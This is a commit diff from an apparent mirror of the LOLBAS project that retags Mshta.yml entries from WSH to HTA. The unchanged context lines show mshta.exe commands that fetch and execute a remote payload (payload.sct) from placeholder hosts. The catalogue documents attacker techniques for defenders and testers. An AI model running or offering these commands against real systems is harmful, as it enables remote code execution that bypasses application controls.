mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-30 16:54:00 +01:00
Update Mshta.yml Tags
Changed Execute: WSH to HTA
This commit is contained in:
parent
e07907c473
commit
c34810b29b
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1218.005
|
MitreID: T1218.005
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
Tags:
|
Tags:
|
||||||
- Execute: WSH
|
- Execute: HTA
|
||||||
- Execute: Remote
|
- Execute: Remote
|
||||||
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
|
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
|
||||||
Description: Executes VBScript supplied as a command line argument.
|
Description: Executes VBScript supplied as a command line argument.
|
||||||
@ -40,7 +40,7 @@ Commands:
|
|||||||
MitreID: T1218.005
|
MitreID: T1218.005
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
|
||||||
Tags:
|
Tags:
|
||||||
- Execute: WSH
|
- Execute: HTA
|
||||||
- Command: mshta.exe https://example.com/payload
|
- Command: mshta.exe https://example.com/payload
|
||||||
Description: It will download a remote payload and place it in INetCache.
|
Description: It will download a remote payload and place it in INetCache.
|
||||||
Usecase: Downloads payload from remote server
|
Usecase: Downloads payload from remote server
|
||||||
|
Loading…
Reference in New Issue
Block a user